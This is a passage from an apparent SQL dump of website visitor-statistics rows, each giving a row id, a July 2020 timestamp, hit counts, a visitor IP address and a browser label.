20817,1594182891,1,1,0,0,'157.55.39.58','other'),(520818,1594182936,1,1,0,0,'131.220.6.152','chrome'),(520819,1594183778,1,1,0,0,'157.55.39.53','other'),(520820,1594183939,1,1,0,0,'62.205.134.182','other'),(520821,1594184101,1,1,0,0,'89.46.105.169','chrome'),(520822,1594184114,1,1,0,0,'207.46.13.151','other'),(520823,1594184193,1,1,0,0,'66.249.70.69','chrome'),(520824,1594184286,2,2,0,0,'185.10.99.21','chrome'),(520825,1594184931,1,1,0,0,'66.249.70.70','chrome'),(520826,1594185129,1,1,0,0,'178.154.200.220','other'),(520827,1594185285,2,2,0,0,'157.55.39.64','other'),(520828,1594185355,1,1,0,0,'66.249.70.69','chrome'),(520829,1594185703,1,1,0,0,'207.46.13.151','other'),(520830,1594185833,1,1,0,0,'69.167.175.221','chrome'),(520831,1594185843,3,3,0,0,'47.75.168.207','chrome'),(520832,1594185845,2,2,0,0,'93.188.2.5','chrome'),(520833,1594185874,2,2,0,0,'107.174.241.135','chrome'),(520834,1594185896,1,1,0,0,'37.73.122.138','chrome'),(520835,1594185952,1,1,0,0,'77.111.247.51','chrome'),(520836,1594185955,1,1,0,0,'66.249.64.33','chrome'),(520837,1594186178,1,1,0,0,'66.249.64.38','chrome'),(520838,1594186384,1,1,0,0,'157.55.39.64','other'),(520839,1594186470,2,2,0,0,'66.249.70.69','chrome'),(520840,1594186549,2,2,0,0,'66.249.70.72','chrome'),(520841,1594187318,1,1,0,0,'207.46.13.151','other'),(520842,1594187620,1,1,0,0,'66.249.64.33','chrome'),(520843,1594187708,1,1,0,0,'66.249.70.72','chrome'),(520844,1594187745,1,1,0,0,'66.249.70.70','chrome'),(520845,1594187789,1,1,0,0,'66.249.64.36','chrome'),(520846,1594188011,1,1,0,0,'193.202.110.26','chrome'),(520847,1594188136,1,1,0,0,'46.164.130.94','chrome'),(520848,1594188241,1,1,0,0,'8.29.198.25','other'),(520849,1594188409,1,1,0,0,'8.29.198.26','other'),(520850,1594188572,1,1,0,0,'207.46.13.154','other'),(520851,1594188923,1,1,0,0,'64.246.165.140','firefox'),(520852,1594189169,1,1,0,0,'37.140.192.23','chrome'),(520853,1594189403,1,1,0,0,'178.154.200.222','other'),(520854,1594189601,1,1,0,0,'66.249.70.69','chrome'),(520855,1594189801,1,1,0,0,'66.249.70.72','chrome'),(520856,1594189962,2,2,0,0,'157.55.39.53','other'),(520857,1594189973,1,1,0,0,'157.55.39.58','other'),(520858,1594190817,2,2,0,0,'66.249.70.72','chrome'),(520859,1594190866,1,1,0,0,'213.180.203.16','other'),(520860,1594191330,1,1,0,0,'31.177.95.69','chrome'),(520861,1594191519,1,1,0,0,'212.1.124.210','chrome'),(520862,1594191613,1,1,0,0,'66.249.70.69','chrome'),(520863,1594193013,1,1,0,0,'207.46.13.154','other'),(520864,1594193370,1,1,0,0,'91.196.177.15','chrome'),(520865,1594193972,2,2,0,0,'118.25.97.227','chrome'),(520866,1594194206,2,2,0,0,'69.163.152.143','chrome'),(520867,1594194398,2,2,0,0,'207.46.13.154','other'),(520868,1594194460,2,2,0,0,'66.249.70.69','chrome'),(520869,1594194757,1,1,0,0,'92.52.159.57','chrome'),(520870,1594194866,1,1,0,0,'91.196.121.134','chrome'),(520871,1594195158,2,2,0,0,'207.46.13.151','other'),(520872,1594195855,2,2,0,0,'66.249.70.69','chrome'),(520873,1594196087,1,1,0,0,'66.249.64.38','chrome'),(520874,1594196279,1,1,0,0,'207.46.13.85','other'),(520875,1594196526,1,1,0,0,'176.111.33.18','firefox'),(520876,1594196611,2,2,0,0,'66.249.70.72','chrome'),(520877,1594196859,1,1,0,0,'91.196.177.46','chrome'),(520878,1594196904,2,2,0,0,'89.44.234.94','chrome'),(520879,1594196939,2,2,0,0,'89.46.105.169','chrome'),(520880,1594196998,1,1,0,0,'95.133.177.117','chrome'),(520881,1594197142,8,8,0,0,'185.11.82.228','other'),(520882,1594198288,1,1,0,0,'66.249.64.38','chrome'),(520883,1594198697,2,2,0,0,'149.255.62.65','chrome'),(520884,1594199072,1,1,0,0,'8.29.198.26','other'),(520885,1594199240,1,1,0,0,'8.29.198.27','other'),(520886,1594199543,1,1,0,0,'17.58.99.7','other'),(520887,1594199609,3,3,0,0,'66.249.70.69','chrome'),(520888,1594199649,1,1,0,0,'157.55.39.64','other'),(520889,1594200147,1,1,0,0,'154.81.86.238','chrome'),(520890,1594200211,2,2,0,0,'185.27.132.35','chrome'),(520891,1594200237,1,1,0,0,'97.74.24.135','chrome'),(520892,1594200319,1,1,0,0,'62.233.120.26','chrome'),(520893,1594201067,1,1,0,0,'66.249.70.69','chrome'),(520894,1594201125,1,1,0,0,'52.14.67.146','chrome'),(520895,1594201777,1,1,0,0,'207.46.13.154','other'),(520896,1594202627,1,1,0,0,'213.180.203.16','other'),(520897,1594202925,1,1,0,0,'66.249.64.36','chrome'),(520898,1594203431,2,2,0,0,'107.174.241.135','chrome'),(520899,1594203484,2,2,0,0,'45.32.106.150','chrome'),(520900,1594203882,1,1,0,0,'207.46.13.154','other'),(520901,1594204006,1,1,0,0,'207.46.13.151','other'),(520902,1594204010,1,1,0,0,'157.55.39.64','other'),(520903,1594204061,1,1,0,0,'66.249.70.70','chrome'),(520904,1594204073,1,1,0,0,'178.154.200.222','other'),(520905,1594204267,1,1,0,0,'157.55.39.58','other'),(520906,1594204400,1,1,0,0,'207.46.13.85','other'),(520907,1594205176,2,2,0,0,'35.214.186.227','chrome'),(520908,1594205306,1,1,0,0,'194.61.24.94','other'),(520909,1594205384,1,1,0,0,'157.55.39.58','other'),(520910,1594206268,1,1,0,0,'91.196.177.147','chrome'),(520911,1594206319,1,1,0,0,'157.55.39.64','other'),(520912,1594206412,1,1,0,0,'91.124.239.66','chrome'),(520913,1594206809,1,1,0,0,'213.180.203.16','other'),(520914,1594206835,2,2,0,0,'95.213.141.126','opera'),(520915,1594207066,1,1,0,0,'109.74.154.72','chrome'),(520916,1594207122,1,1,0,0,'157.55.39.53','other'),(520917,1594208030,1,1,0,0,'91.227.16.127','chrome'),(520918,1594208037,2,2,0,0,'91.208.99.2','chrome'),(520919,1594208212,1,1,0,0,'91.196.177.46','chrome'),(520920,1594208537,1,1,0,0,'178.154.200.236','other'),(520921,1594208905,1,1,0,0,'66.249.64.38','chrome'),(520922,1594209241,1,1,0,0,'157.55.39.53','other'),(520923,1594209740,1,1,0,0,'192.99.6.216','chrome'),(520924,1594209798,1,1,0,0,'66.249.70.72','chrome'),(520925,1594209901,1,1,0,0,'66.249.64.36','chrome'),(520926,1594209905,1,1,0,0,'8.29.198.26','other'),(520927,1594210076,1,1,0,0,'8.29.198.25','other'),(520928,1594210424,1,1,0,0,'178.154.200.222','other'),(520929,1594210578,1,1,0,0,'66.249.70.70','chrome'),(520930,1594210968,1,1,0,0,'66.249.70.69','chrome'),(520931,1594211091,1,1,0,0,'157.55.39.58','other'),(520932,1594211502,1,1,0,0,'93.188.2.5','chrome'),(520933,1594211510,1,1,0,0,'178.154.200.222','other'),(520934,1594211964,1,1,0,0,'157.55.39.53','other'),(520935,1594212944,1,1,0,0,'35.208.104.22','chrome'),(520936,1594213372,1,1,0,0,'91.196.178.171','other'),(520937,1594213561,1,1,0,0,'66.249.64.36','chrome'),(520938,1594213606,1,1,0,0,'66.249.70.72','chrome'),(520939,1594214505,1,1,0,0,'66.249.70.70','chrome'),(520940,1594214508,1,1,0,0,'66.249.70.72','chrome'),(520941,1594214639,1,1,0,0,'157.55.39.64','other'),(520942,1594214781,8,8,0,0,'185.11.82.228','other'),(520943,1594214981,1,1,0,0,'37.73.123.227','chrome'),(520944,1594215563,1,1,0,0,'207.46.13.85','other'),(520945,1594215651,1,1,0,0,'66.249.70.70','chrome'),(520946,1594215921,1,1,0,0,'94.153.67.121','chrome'),(520947,1594216203,1,1,0,0,'185.27.132.35','chrome'),(520948,1594216376,1,1,0,0,'157.55.39.53','other'),(520949,1594216396,1,1,0,0,'37.140.192.23','chrome'),(520950,1594216812,1,1,0,0,'213.180.203.54','other'),(520951,1594216887,1,1,0,0,'91.196.177.15','chrome'),(520952,1594217026,1,1,0,0,'66.249.70.72','chrome'),(520953,1594217425,1,1,0,0,'207.46.13.85','other'),(520954,1594217504,2,2,0,0,'178.154.200.222','other'),(520955,1594217616,1,1,0,0,'40.77.190.138','other'),(520956,1594217756,1,1,0,0,'66.249.70.70','chrome'),(520957,1594217842,1,1,0,0,'91.196.177.15','chrome'),(520958,1594218681,1,1,0,0,'178.154.200.236','other'),(520959,1594219035,1,1,0,0,'91.196.178.12','chrome'),(520960,1594219190,1,1,0,0,'89.46.104.182','chrome'),(520961,1594219242,1,1,0,0,'40.77.191.129','other'),(520962,1594219249,1,1,0,0,'91.209.11.236','other'),(520963,1594219370,1,1,0,0,'144.217.158.133','chrome'),(520964,1594219579,1,1,0,0,'157.55.39.53','other'),(520965,1594219778,1,1,0,0,'66.249.64.38','chrome'),(520966,1594220491,1,1,0,0,'66.249.70.70','chrome'),(520967,1594220726,1,1,0,0,'8.29.198.25','other'),(520968,1594220900,1,1,0,0,'8.29.198.26','other'),(520969,1594221143,2,2,0,0,'66.249.70.69','chrome'),(520970,1594221508,11,11,0,0,'216.18.204.154','firefox'),(520971,1594221543,1,1,0,0,'66.249.70.72','chrome'),(520972,1594222569,1,1,0,0,'66.249.70.70','chrome'),(520973,1594222880,1,1,0,0,'207.46.13.154','other'),(520974,1594223350,1,1,0,0,'66.249.64.36','chrome'),(520975,1594223399,1,1,0,0,'157.55.39.64','other'),(520976,1594223909,1,1,0,0,'157.55.39.53','other'),(520977,1594223957,1,1,0,0,'66.249.70.72','chrome'),(520978,1594225385,1,1,0,0,'207.46.13.85','other'),(520979,1594226317,2,2,0,0,'66.249.70.70','chrome'),(520980,1594227577,1,1,0,0,'178.154.200.222','other'),(520981,1594227602,1,1,0,0,'207.46.13.85','other'),(520982,1594227737,1,1,0,0,'66.249.70.70','chrome'),(520983,1594227752,1,1,0,0,'157.55.39.64','other'),(520984,1594227765,2,2,0,0,'157.55.39.53','other'),(520985,1594228820,3,3,0,0,'47.104.168.72','chrome'),(520986,1594229552,2,2,0,0,'207.46.13.151','other'),(520987,1594229678,1,1,0,0,'66.249.70.72','chrome'),(520988,1594229836,1,1,0,0,'207.46.13.85','other'),(520989,1594230328,2,2,0,0,'45.32.106.150','chrome'),(520990,1594231185,8,8,0,0,'185.11.82.228','other'),(520991,1594231192,1,1,0,0,'66.249.70.69','chrome'),(520992,1594231555,2,2,0,0,'8.29.198.26','other'),(520993,1594231898,1,1,0,0,'198.71.235.25','chrome'),(520994,1594232644,1,1,0,0,'207.46.13.151','other'),(520995,1594233024,2,2,0,0,'66.249.70.70','chrome'),(520996,1594233049,1,1,0,0,'207.46.13.85','other'),(520997,1594233100,2,2,0,0,'45.32.127.11','chrome'),(520998,1594233223,1,1,0,0,'129.226.69.89','chrome'),(520999,1594233224,1,1,0,0,'89.46.107.212','chrome'),(521000,1594233505,1,1,0,0,'66.249.64.36','chrome'),(521001,1594233558,2,2,0,0,'178.208.83.57','chrome'),(521002,1594234297,1,1,0,0,'66.249.70.70','chrome'),(521003,1594235110,2,2,0,0,'192.145.239.38','chrome'),(521004,1594235668,1,1,0,0,'66.249.70.69','chrome'),(521005,1594235822,1,1,0,0,'207.46.13.85','other'),(521006,1594236267,1,1,0,0,'88.155.188.86','chrome'),(521007,1594236550,2,2,0,0,'89.46.105.229','chrome'),(521008,1594236901,1,1,0,0,'207.46.13.151','other'),(521009,1594237805,3,3,0,0,'67.227.152.219','chrome'),(521010,1594237955,1,1,0,0,'185.224.138.62','chrome'),(521011,1594238081,3,3,0,0,'157.55.39.64','other'),(521012,1594238120,2,2,0,0,'149.255.62.65','chrome'),(521013,1594238236,1,1,0,0,'52.5.40.222','chrome'),(521014,1594238681,1,1,0,0,'157.55.39.22','other'),(521015,1594239339,1,1,0,0,'66.249.70.72','chrome'),(521016,1594239399,1,1,0,0,'37.140.192.182','chrome'),(521017,1594239651,1,1,0,0,'157.55.39.64','other'),(521018,1594241477,1,1,0,0,'178.154.200.222','other'),(521019,1594242284,1,1,0,0,'207.46.13.151','other'),(521020,1594242385,2,2,0,0,'8.29.198.25','other'),(521021,1594243067,1,1,0,0,'66.249.70.69','chrome'),(521022,1594243098,1,1,0,0,'5.45.207.89','other'),(521023,1594243605,1,1,0,0,'66.249.70.70','chrome'),(521024,1594244046,1,1,0,0,'185.196.8.138','chrome'),(521025,1594245477,1,1,0,0,'178.154.200.222','other'),(521026,1594245682,1,1,0,0,'207.46.13.151','other'),(521027,1594245797,1,1,0,0,'66.249.70.70','chrome'),(521028,1594246430,8,8,0,0,'185.11.82.228','other'),(521029,1594246491,1,1,0,0,'213.180.203.16','other'),(521030,1594246972,2,2,0,0,'157.7.44.144','chrome'),(521031,1594246975,2,2,0,0,'192.185.81.239','chrome'),(521032,1594247057,1,1,0,0,'5.101.156.175','chrome'),(521033,1594247270,1,1,0,0,'89.46.106.231','chrome'),(521034,1594247450,1,1,0,0,'37.140.192.23','chrome'),(521035,1594247517,1,1,0,0,'5.45.207.162','other'),(521036,1594247703,1,1,0,0,'157.55.39.64','other'),(521037,1594248319,1,1,0,0,'89.46.109.174','chrome'),(521038,1594248777,1,1,0,0,'213.180.203.16','other'),(521039,1594249196,1,1,0,0,'66.249.70.72','chrome'),(521040,1594249770,1,1,0,0,'192.185.81.239','chrome'),(521041,1594249827,2,2,0,0,'62.210.185.4','chrome'),(521042,1594251086,1,1,0,0,'178.154.200.175','other'),(521043,1594251437,1,1,0,0,'37.251.155.58','chrome'),(521044,1594251464,1,1,0,0,'154.81.86.238','chrome'),(521045,1594252506,1,1,0,0,'62.205.134.182','other'),(521046,1594253156,1,1,0,0,'175.158.102.105','chrome'),(521047,1594253220,1,1,0,0,'8.29.198.27','other'),(521048,1594253391,1,1,0,0,'8.29.198.25','other'),(521049,1594253457,1,1,0,0,'66.249.70.72','chrome'),(521050,1594254519,1,1,0,0,'207.46.13.154','other'),(521051,1594254597,6,6,0,0,'216.18.204.154','firefox'),(521052,1594255489,1,1,0,0,'66.249.70.72','chrome'),(521053,1594255649,1,1,0,0,'207.46.13.85','other'),(521054,1594256083,1,1,0,0,'207.46.13.151','other'),(521055,1594256385,1,1,0,0,'193.106.30.99','firefox'),(521056,1594256616,2,2,0,0,'207.46.13.85','other'),(521057,1594257204,1,1,0,0,'97.74.229.105','chrome'),(521058,1594257325,1,1,0,0,'85.25.237.25','chrome'),(521059,1594257341,1,1,0,0,'157.55.39.64','other'),(521060,1594257344,1,1,0,0,'108.175.9.28','chrome'),(521061,1594257458,2,2,0,0,'93.188.2.5','chrome'),(521062,1594257691,1,1,0,0,'54.214.229.150','chrome'),(521063,1594259401,1,1,0,0,'207.46.13.85','other'),(521064,1594259452,1,1,0,0,'207.46.13.137','other'),(521065,1594259653,2,2,0,0,'207.46.13.154','other'),(521066,1594260069,1,0,1,0,'66.249.70.72',''),(521067,1594260269,1,1,0,0,'157.55.39.198','other'),(521068,1594260995,1,1,0,0,'178.154.200.222','other'),(521069,1594261106,1,1,0,0,'207.46.13.154','other'),(521070,1594261423,1,1,0,0,'62.173.145.191','chrome'),(521071,1594261544,1,1,0,0,'188.165.225.146','chrome'),(521072,1594261808,1,1,0,0,'178.154.200.97','other'),(521073,1594262044,1,1,0,0,'213.180.203.109','other'),(521074,1594262642,1,1,0,0,'207.46.13.85','other'),(521075,1594262983,1,1,0,0,'157.55.39.198','other'),(521076,1594263255,2,2,0,0,'103.86.51.104','chrome'),(521077,1594263349,1,1,0,0,'66.249.70.72','chrome'),(521078,1594264049,1,1,0,0,'8.29.198.26','other'),(521079,1594264075,8,8,0,0,'185.11.82.228','other'),(521080,1594264214,1,1,0,0,'8.29.198.25','other'),(521081,1594264421,1,1,0,0,'178.154.200.222','other'),(521082,1594264557,2,2,0,0,'104.207.233.143','chrome'),(521083,1594264616,1,1,0,0,'69.89.31.198','chrome'),(521084,1594264677,1,1,0,0,'66.249.70.70','chrome'),(521085,1594264735,1,1,0,0,'178.154.200.207','other'),(521086,1594265153,1,0,1,0,'66.249.70.72',''),(521087,1594266510,2,2,0,0,'207.46.13.154','other'),(521088,1594266554,1,1,0,0,'66.249.70.69','chrome'),(521089,1594266938,1,1,0,0,'103.12.50.215','chrome'),(521090,1594267401,1,1,0,0,'40.77.188.76','other'),(521091,1594267502,2,2,0,0,'51.68.11.195','chrome'),(521092,1594267802,1,1,0,0,'157.55.39.58','other'),(521093,1594267994,1,1,0,0,'37.140.192.182','chrome'),(521094,1594268061,1,1,0,0,'66.249.64.36','chrome'),(521095,1594268324,1,1,0,0,'207.46.13.151','other'),(521096,1594268535,1,1,0,0,'213.180.203.16','other'),(521097,1594269086,2,2,0,0,'207.46.13.85','other'),(521098,1594269138,2,2,0,0,'46.37.171.183','chrome'),(521099,1594269200,1,1,0,0,'5.255.253.104','other'),(521100,1594269231,1,1,0,0,'131.220.6.152','chrome'),(521101,1594270317,1,1,0,0,'89.46.106.231','chrome'),(521102,1594270356,1,1,0,0,'62.205.134.182','other'),(521103,1594270643,3,3,0,0,'77.246.156.194','chrome'),(521104,1594271487,1,1,0,0,'207.46.13.151','other'),(521105,1594272041,1,1,0,0,'160.153.155.32','chrome'),(521106,1594274029,1,1,0,0,'5.255.253.82','other'),(521107,1594274257,2,2,0,0,'91.196.177.46','chrome'),(521108,1594274568,1,1,0,0,'93.188.2.5','chrome'),(521109,1594274590,2,2,0,0,'192.227.158.62','chrome'),(521110,1594274851,2,2,0,0,'89.46.105.110','chrome'),(521111,1594274880,1,1,0,0,'8.29.198.25','other'),(521112,1594275038,1,1,0,0,'8.29.198.26','other'),(521113,1594275137,8,8,0,0,'185.11.82.228','other'),(521114,1594275202,1,1,0,0,'198.38.82.11','chrome'),(521115,1594276144,2,2,0,0,'222.122.60.18','chrome'),(521116,1594276154,1,1,0,0,'157.55.39.58','other'),(521117,1594276365,1,1,0,0,'212.1.124.210','chrome'),(521118,1594276474,1,1,0,0,'178.154.200.41','other'),(521119,1594276489,8,8,0,0,'185.11.82.228','other'),(521120,1594277416,1,1,0,0,'207.46.13.154','other'),(521121,1594277577,1,1,0,0,'91.196.178.77','chrome'),(521122,1594277751,1,1,0,0,'154.81.86.238','chrome'),(521123,1594277874,8,8,0,0,'185.11.82.228','other'),(521124,1594278117,1,1,0,0,'46.219.6.40','chrome'),(521125,1594278521,1,1,0,0,'207.46.13.151','other'),(521126,1594278773,7,7,0,0,'18.206.194.134','other'),(521127,1594279292,8,8,0,0,'185.11.82.228','other'),(521128,1594279789,1,1,0,0,'207.46.13.151','other'),(521129,1594279886,6,6,0,0,'18.206.194.134','other'),(521130,1594280560,1,1,0,0,'91.196.178.187','chrome'),(521131,1594280689,8,8,0,0,'185.11.82.228','other'),(521132,1594280879,5,5,0,0,'18.206.194.134','other'),(521133,1594280990,2,2,0,0,'207.46.13.151','other'),(521134,1594281248,1,1,0,0,'194.61.24.94','other'),(521135,1594281676,1,1,0,0,'207.46.13.154','other'),(521136,1594281977,7,7,0,0,'18.206.194.134','other'),(521137,1594282117,8,8,0,0,'185.11.82.228','other'),(521138,1594282925,5,5,0,0,'18.206.194.134','other'),(521139,1594283522,1,1,0,0,'207.46.13.154','other'),(521140,1594283576,1,1,0,0,'207.46.13.85','other'),(521141,1594283606,8,8,0,0,'185.11.82.228','other'),(521142,1594283918,9,9,0,0,'18.206.194.134','other'),(521143,1594283939,1,1,0,0,'37.53.73.6','chrome'),(521144,1594283941,1,1,0,0,'91.196.178.77','chrome'),(521145,1594285001,8,8,0,0,'18.206.194.134','other'),(521146,1594285066,8,8,0,0,'185.11.82.228','other'),(521147,1594285247,1,1,0,0,'207.46.13.85','other'),(521148,1594285345,1,1,0,0,'40.77.189.162','other'),(521149,1594285599,2,2,0,0,'144.217.158.133','chrome'),(521150,1594285708,1,1,0,0,'8.29.198.27','other'),(521151,1594285860,1,1,0,0,'8.29.198.25','other'),(521152,1594285944,8,8,0,0,'18.206.194.134','other'),(521153,1594286055,1,1,0,0,'66.249.70.72','chrome'),(521154,1594286081,1,1,0,0,'66.249.70.70','chrome'),(521155,1594286522,8,8,0,0,'185.11.82.228','other'),(521156,1594286656,2,2,0,0,'207.46.13.154','other'),(521157,1594287063,1,1,0,0,'18.206.194.134','other'),(521158,1594287177,1,1,0,0,'3.128.254.178','chrome'),(521159,1594287392,2,2,0,0,'51.68.11.207','chrome'),(521160,1594287984,8,8,0,0,'185.11.82.228','other'),(521161,1594288054,1,1,0,0,'66.249.70.69','chrome'),(521162,1594288912,1,1,0,0,'37.73.189.121','chrome'),(521163,1594289034,1,1,0,0,'91.196.178.187','chrome'),(521164,1594289469,8,8,0,0,'185.11.82.228','other'),(521165,1594290321,3,3,0,0,'157.55.39.58','other'),(521166,1594290405,1,1,0,0,'67.205.40.241','chrome'),(521167,1594290468,1,1,0,0,'47.52.43.140','chrome'),(521168,1594290640,2,2,0,0,'128.199.65.117','chrome'),(521169,1594290956,8,8,0,0,'185.11.82.228','other'),(521170,1594291921,1,1,0,0,'193.202.110.26','chrome'),(521171,1594292401,1,1,0,0,'157.55.39.228','other'),(521172,1594292411,8,8,0,0,'185.11.82.228','other'),(521173,1594292540,1,1,0,0,'109.74.154.72','chrome'),(521174,1594293345,1,1,0,0,'89.46.104.201','chrome'),(521175,1594293584,1,1,0,0,'58.64.157.170','chrome'),(521176,1594293593,1,1,0,0,'66.249.64.33','chrome'),(521177,1594293628,1,1,0,0,'91.196.178.77','chrome'),(521178,1594293851,8,8,0,0,'185.11.82.228','other'),(521179,1594295173,2,2,0,0,'157.7.44.144','chrome'),(521180,1594295246,8,8,0,0,'185.11.82.228','other'),(521181,1594296543,2,2,0,0,'8.29.198.26','other'),(521182,1594296620,8,8,0,0,'185.11.82.228','other'),(521183,1594298023,8,8,0,0,'185.11.82.228','other'),(521184,1594298549,1,1,0,0,'207.46.13.85','other'),(521185,1594298681,2,2,0,0,'104.207.233.143','chrome'),(521186,1594298711,1,1,0,0,'64.111.117.161','chrome'),(521187,1594298807,2,2,0,0,'51.68.11.195','chrome'),(521188,1594298813,1,1,0,0,'77.246.156.194','chrome'),(521189,1594298919,1,1,0,0,'207.46.13.151','other'),(521190,1594299402,8,8,0,0,'185.11.82.228','other'),(521191,1594299563,1,1,0,0,'157.55.39.58','other'),(521192,1594300139,1,1,0,0,'195.230.149.30','chrome'),(521193,1594300249,1,1,0,0,'91.124.239.66','chrome'),(521194,1594300415,2,2,0,0,'66.249.70.69','chrome'),(521195,1594300450,3,3,0,0,'198.100.149.227','chrome'),(521196,1594300770,8,8,0,0,'185.11.82.228','other'),(521197,1594300804,1,1,0,0,'178.154.200.222','other'),(521198,1594301251,1,1,0,0,'207.46.13.210','other'),(521199,1594301397,1,1,0,0,'157.55.39.228','other'),(521200,1594301814,1,1,0,0,'104.219.53.197','chrome'),(521201,1594302145,8,8,0,0,'185.11.82.228','other'),(521202,1594302200,1,1,0,0,'192.254.250.172','chrome'),(521203,1594302427,1,1,0,0,'95.216.96.170','other'),(521204,1594302675,2,2,0,0,'31.13.103.24','other'),(521205,1594302708,1,1,0,0,'91.196.178.151','chrome'),(521206,1594302725,1,1,0,0,'31.13.103.7','other'),(521207,1594302726,1,1,0,0,'31.13.103.10','other'),(521208,1594302751,1,1,0,0,'31.13.103.20','other'),(521209,1594302752,1,1,0,0,'31.13.103.111','other'),(521210,1594302771,1,1,0,0,'31.13.103.113','other'),(521211,1594302860,1,1,0,0,'31.13.103.12','other'),(521212,1594302999,1,1,0,0,'157.55.39.58','other'),(521213,1594303343,1,1,0,0,'51.158.161.141','firefox'),(521214,1594303368,1,1,0,0,'82.146.50.47','chrome'),(521215,1594303533,8,8,0,0,'185.11.82.228','other'),(521216,1594303558,1,1,0,0,'110.49.59.168','chrome'),(521217,1594303731,1,1,0,0,'88.198.177.113','chrome'),(521218,1594303958,1,1,0,0,'5.61.250.112','chrome'),(521219,1594304404,1,1,0,0,'95.216.96.170','other'),(521220,1594304906,8,8,0,0,'185.11.82.228','other'),(521221,1594305280,1,1,0,0,'94.124.122.11','chrome'),(521222,1594305343,1,1,0,0,'115.146.122.250','chrome'),(521223,1594305468,1,1,0,0,'78.129.222.182','chrome'),(521224,1594305639,1,1,0,0,'31.177.95.69','chrome'),(521225,1594306201,1,1,0,0,'37.73.22.215','chrome'),(521226,1594306304,8,8,0,0,'185.11.82.228','other'),(521227,1594307016,1,1,0,0,'5.101.156.175','chrome'),(521228,1594307164,1,1,0,0,'207.46.13.151','other'),(521229,1594307366,1,1,0,0,'8.29.198.25','other'),(521230,1594307505,1,1,0,0,'8.29.198.27','other'),(521231,1594307705,8,8,0,0,'185.11.82.228','other'),(521232,1594307748,1,1,0,0,'91.196.178.90','chrome'),(521233,1594307799,1,1,0,0,'46.21.198.188','chrome'),(521234,1594309036,8,8,0,0,'185.11.82.228','other'),(521235,1594309090,1,1,0,0,'157.55.39.58','other'),(521236,1594309773,1,1,0,0,'51.68.11.207','chrome'),(521237,1594309796,1,1,0,0,'91.208.99.2','chrome'),(521238,1594309834,1,1,0,0,'207.46.13.201','other'),(521239,1594310406,8,8,0,0,'185.11.82.228','other'),(521240,1594310567,1,1,0,0,'178.154.200.222','other'),(521241,1594311239,1,1,0,0,'91.196.178.176','chrome'),(521242,1594311699,8,8,0,0,'185.11.82.228','other'),(521243,1594311867,1,1,0,0,'207.46.13.201','other'),(521244,1594312022,1,1,0,0,'37.73.99.169','chrome'),(521245,1594312947,1,1,0,0,'157.7.44.144','chrome'),(521246,1594313007,8,8,0,0,'185.11.82.228','other'),(521247,1594313056,1,1,0,0,'66.249.64.38','chrome'),(521248,1594314349,8,8,0,0,'185.11.82.228','other'),(521249,1594314947,1,1,0,0,'66.249.70.72','chrome'),(521250,1594315656,8,8,0,0,'185.11.82.228','other'),(521251,1594315932,1,1,0,0,'207.46.13.151','other'),(521252,1594316410,1,1,0,0,'207.46.13.201','other'),(521253,1594316952,8,8,0,0,'185.11.82.228','other'),(521254,1594318010,2,2,0,0,'91.208.99.2','chrome'),(521255,1594318191,1,1,0,0,'8.29.198.25','other'),(521256,1594318290,8,8,0,0,'185.11.82.228','other'),(521257,1594318322,1,1,0,0,'8.29.198.27','other'),(521258,1594319440,2,2,0,0,'47.89.29.162','chrome'),(521259,1594319632,8,8,0,0,'185.11.82.228','other'),(521260,1594319744,1,1,0,0,'89.46.105.246','chrome'),(521261,1594320935,8,8,0,0,'185.11.82.228','other'),(521262,1594321220,60,60,0,0,'192.99.160.200','other'),(521263,1594321937,1,1,0,0,'5.188.62.25','chrome'),(521264,1594322242,8,8,0,0,'185.11.82.228','other'),(521265,1594322382,3,3,0,0,'91.209.11.236','other'),(521266,1594323526,8,8,0,0,'185.11.82.228','other'),(521267,1594323683,1,1,0,0,'157.55.39.58','other'),(521268,1594323730,2,2,0,0,'91.209.11.236','other'),(521269,1594324044,1,1,0,0,'46.188.98.10','msie'),(521270,1594324291,8,8,0,0,'46.4.107.106','other'),(521271,1594324844,8,8,0,0,'185.11.82.228','other'),(521272,1594324913,2,2,0,0,'91.209.11.236','other'),(521273,1594326131,8,8,0,0,'185.11.82.228','other'),(521274,1594326990,4,4,0,0,'132.148.29.143','chrome'),(521275,1594327405,8,8,0,0,'185.11.82.228','other'),(521276,1594327879,2,2,0,0,'66.249.70.70','chrome'),(521277,1594327974,2,2,0,0,'66.249.70.72','chrome'),(521278,1594328074,3,3,0,0,'66.249.70.69','chrome'),(521279,1594328267,2,2,0,0,'66.249.64.36','chrome'),(521280,1594328733,8,8,0,0,'185.11.82.228','other'),(521281,1594328861,1,1,0,0,'207.46.13.189','other'),(521282,1594329013,1,1,0,0,'8.29.198.27','other'),(521283,1594329147,1,1,0,0,'8.29.198.25','other'),(521284,1594329503,1,1,0,0,'198.38.84.223','chrome'),(521285,1594329700,3,3,0,0,'66.249.70.70','chrome'),(521286,1594329705,1,1,0,0,'178.208.83.57','chrome'),(521287,1594329712,2,2,0,0,'66.249.70.69','chrome'),(521288,1594329989,8,8,0,0,'185.11.82.228','other'),(521289,1594330081,2,2,0,0,'66.249.70.72','chrome'),(521290,1594330328,1,1,0,0,'66.249.64.36','chrome'),(521291,1594330534,1,1,0,0,'66.249.64.33','chrome'),(521292,1594330642,3,3,0,0,'66.249.70.69','chrome'),(521293,1594330849,3,3,0,0,'66.249.70.70','chrome'),(521294,1594331031,1,1,0,0,'207.46.13.189','other'),(521295,1594331084,1,1,0,0,'66.249.70.72','chrome'),(521296,1594331243,8,8,0,0,'185.11.82.228','other'),(521297,1594332007,1,1,0,0,'66.249.64.33','chrome'),(521298,1594332211,1,0,1,0,'66.249.70.72',''),(521299,1594332288,2,2,0,0,'66.249.70.72','chrome'),(521300,1594332344,1,1,0,0,'66.249.64.38','chrome'),(521301,1594332485,8,8,0,0,'185.11.82.228','other'),(521302,1594333318,4,4,0,0,'66.249.70.69','chrome'),(521303,1594333733,8,8,0,0,'185.11.82.228','other'),(521304,1594334076,1,1,0,0,'66.249.64.38','chrome'),(521305,1594334456,2,2,0,0,'178.208.83.21','chrome'),(521306,1594334582,2,2,0,0,'66.249.70.69','chrome'),(521307,1594334981,8,8,0,0,'185.11.82.228','other'),(521308,1594335568,1,1,0,0,'66.249.70.70','chrome'),(521309,1594335922,1,1,0,0,'66.249.70.72','chrome'),(521310,1594336172,1,1,0,0,'66.249.70.69','chrome'),(521311,1594336242,8,8,0,0,'185.11.82.228','other'),(521312,1594337026,3,3,0,0,'66.249.70.70','chrome'),(521313,1594337154,4,4,0,0,'66.249.70.69','chrome'),(521314,1594337188,1,1,0,0,'66.249.64.36','chrome'),(521315,1594337547,8,8,0,0,'185.11.82.228','other'),(521316,1594338116,5,5,0,0,'6